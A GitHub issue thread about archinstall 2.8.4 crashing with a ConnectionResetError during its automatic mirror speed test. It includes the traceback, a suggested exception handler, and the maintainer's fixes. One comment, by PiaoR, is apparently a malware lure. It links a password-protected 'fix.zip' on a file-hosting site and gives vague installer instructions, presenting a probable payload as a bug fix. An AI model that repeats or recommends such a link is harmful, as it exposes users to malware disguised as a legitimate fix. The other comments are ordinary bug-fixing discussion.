### ISSUE TITLE
Connection reset by peer in mirror test will cause script crash

### ISSUE THREAD

**Issue by suica-me** [archlinux/archinstall#2646]
### Which ISO version are you using?

N/A (archinstall 2.8.4-1)

### The installation log

```json
Hardware model detected: QEMU Standard PC (Q35 + ICH9, 2009); UEFI mode: True
Processor model detected: QEMU Virtual CPU version 2.5+
Memory statistics: 3505344 available out of 3972776 total installed
Virtualization detected: kvm; is VM: True
Graphics devices detected: dict_keys(['Device 1234:1111 (rev 02)'])
Disk states before installing: [
----------------------------------------------------------------------------------
                                 --DLETED--
                                 Some disk info
----------------------------------------------------------------------------------
]
Checking version...
Failed determine pacman version: ['/usr/bin/pacman', '-Qu', 'archinstall'] exited with abnormal exit code [1]: [?25l[?25h
    score: 2
Loaded mirror mirror.aarnet.edu.au with current score of 2
    score: 4
Loaded mirror mirror.aarnet.edu.au with current score of 4
    score: 3
----------------------------------------------------------------------------------
                                 --DLETED--
                                 Load mirror
----------------------------------------------------------------------------------
Loaded mirror mirrors.reitarovskyi.tech with current score of 3
    score: 3
Loaded mirror mirrors.reitarovskyi.tech with current score of 3
    score: 13
Loaded mirror mirror.syxpi.fr with current score of 13
    score: 13
Loaded mirror mirror.syxpi.fr with current score of 13
Checking download speed of mirrors.163.com[9] by fetching: http://mirrors.163.com/archlinux/core/os/x86_64/core.db
    speed: 439726.55680225976 (0.41MiB/s)
Checking download speed of mirrors.ustc.edu.cn[2] by fetching: http://mirrors.ustc.edu.cn/archlinux/core/os/x86_64/core.db
    speed: 2457018.5586694996 (2.34MiB/s)
----------------------------------------------------------------------------------
                                 --DLETED--
                                 Mirror speed test
----------------------------------------------------------------------------------
Checking download speed of mirror.nyist.edu.cn[6] by fetching: https://mirror.nyist.edu.cn/archlinux/core/os/x86_64/core.db
    speed: 1406425.7519304594 (1.34MiB/s)
Checking download speed of mirrors.qlu.edu.cn[11] by fetching: https://mirrors.qlu.edu.cn/archlinux/core/os/x86_64/core.db
    speed: 1070718.81270969 (1.02MiB/s)
Checking download speed of mirrors.jxust.edu.cn[14] by fetching: http://mirrors.jxust.edu.cn/archlinux/core/os/x86_64/core.db    <------   PROBLEM
Traceback (most recent call last):
  File "/usr/lib/python3.12/site-packages/archinstall/__init__.py", line 356, in run_as_a_module
    main()
  File "/usr/lib/python3.12/site-packages/archinstall/__init__.py", line 331, in main
    importlib.import_module(mod_name)
  File "/usr/lib/python3.12/importlib/__init__.py", line 90, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<frozen importlib._bootstrap>", line 1387, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1360, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1331, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 935, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 995, in exec_module
  File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
  File "/usr/lib/python3.12/site-packages/archinstall/scripts/guided.py", line 224, in <module>
    ask_user_questions()
  File "/usr/lib/python3.12/site-packages/archinstall/scripts/guided.py", line 97, in ask_user_questions
    global_menu.run()
  File "/usr/lib/python3.12/site-packages/archinstall/lib/menu/abstract_menu.py", line 328, in run
    if not self._process_selection(value):
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/menu/abstract_menu.py", line 345, in _process_selection
    return self.exec_option(config_name, selector)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/menu/abstract_menu.py", line 366, in exec_option
    result = selector.func(cur_value)
             ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/global_menu.py", line 58, in <lambda>
    lambda preset: self._mirror_configuration(preset),
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/global_menu.py", line 455, in _mirror_configuration
    mirror_configuration = MirrorMenu(data_store, preset=preset).run()
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/mirrors.py", line 235, in run
    super().run(allow_reset=allow_reset)
  File "/usr/lib/python3.12/site-packages/archinstall/lib/menu/abstract_menu.py", line 328, in run
    if not self._process_selection(value):
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/menu/abstract_menu.py", line 345, in _process_selection
    return self.exec_option(config_name, selector)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/menu/abstract_menu.py", line 366, in exec_option
    result = selector.func(cur_value)
             ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/mirrors.py", line 210, in <lambda>
    lambda preset: select_mirror_regions(preset),
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/mirrors.py", line 277, in select_mirror_regions
    f"{mirror.url}$repo/os/$arch" for mirror in sort_mirrors_by_performance(mirrors[selected])
                                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/mirrors.py", line 290, in sort_mirrors_by_performance
    return sorted(mirror_list, key=lambda mirror: (mirror.score, mirror.speed))
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/mirrors.py", line 290, in <lambda>
    return sorted(mirror_list, key=lambda mirror: (mirror.score, mirror.speed))
                                                                 ^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/archinstall/lib/models/mirrors.py", line 43, in speed
    with urllib.request.urlopen(req, None, 5) as handle, DownloadTimer(timeout=5) as timer:
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/urllib/request.py", line 215, in urlopen
    return opener.open(url, data, timeout)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/urllib/request.py", line 515, in open
    response = self._open(req, data)
               ^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/urllib/request.py", line 532, in _open
    result = self._call_chain(self.handle_open, protocol, protocol +
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/urllib/request.py", line 492, in _call_chain
    result = func(*args)
             ^^^^^^^^^^^
  File "/usr/lib/python3.12/urllib/request.py", line 1373, in http_open
    return self.do_open(http.client.HTTPConnection, req)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/urllib/request.py", line 1348, in do_open
    r = h.getresponse()
        ^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/http/client.py", line 1428, in getresponse
    response.begin()
  File "/usr/lib/python3.12/http/client.py", line 331, in begin
    version, status, reason = self._read_status()
                              ^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/http/client.py", line 292, in _read_status
    line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/socket.py", line 708, in readinto
    return self._sock.recv_into(b)
           ^^^^^^^^^^^^^^^^^^^^^^^
ConnectionResetError: [Errno 104] Connection reset by peer
```

#### Description of the issue
\
When use the last version(2.8.4-1), it will do an auto mirror speed test.
If any problem happened when test the mirror, the script will crash.

https://github.com/archlinux/archinstall/blob/master/archinstall/lib/models/mirrors.py#L37
```python
try:
    with urllib.request.urlopen(req, None, 5) as handle, DownloadTimer(timeout=5) as timer:
        size = len(handle.read())

    self._speed = size / timer.time
    debug(f"    speed: {self._speed} ({int(self._speed / 1024 / 1024 * 100) / 100}MiB/s)")
except http.client.IncompleteRead:
    debug(f"    speed: <undetermined>")
    self._speed = None
# maybe add a ConnectionError except for another error
except ConnectionError as E:
    debug(f"    speed: <undetermined>")
    debug(f"    Connection error: {E}")
    self._speed = None
```

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Torxed** [comment]
Hi.

I pushed a release 20min ago that should take care of this issue.
For the next release I'll include the `ConnectionError` exception as well as you suggest.

Try `pacman -Sy archinstall` and give it a spin :)

**Comment by suica-me** [comment]
Yes! It's fixed at 2.8.5, thank you so much!
But maybe caused another problem.
https://github.com/archlinux/archinstall/blob/master/archinstall/lib/mirrors.py#L290
If the speed is None, sorted will throw "TypeError: '<' not supported between instances of 'NoneType' and 'float'"

**Comment by Torxed** [comment]
You're correct, total brain fart on my end. Not sure why I ended up setting it to `None` because in my test code I used `0` for zero speed. 

I'll correct it, thank you!

**Comment by suica-me** [comment]
> You're correct, total brain fart on my end. Not sure why I ended up setting it to `None` because in my test code I used `0` for zero speed.
> 
> I'll correct it, thank you!

I have made a pull request for this issue, can you please check that?
Thank you!
